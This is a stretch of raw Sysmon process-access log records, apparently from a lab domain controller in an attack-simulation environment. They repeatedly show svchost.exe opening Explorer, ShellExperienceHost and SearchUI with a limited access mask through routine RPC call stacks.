08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052229Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052228Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052227Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052226Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052225Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052224Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052223Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052222Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052221Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052220Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052219Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052218Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052217Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052216Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052215Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052214Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052213Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052212Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052211Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052210Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052209Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052208Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052207Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052206Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052205Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052204Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052203Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052202Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052201Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052200Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052199Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052198Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 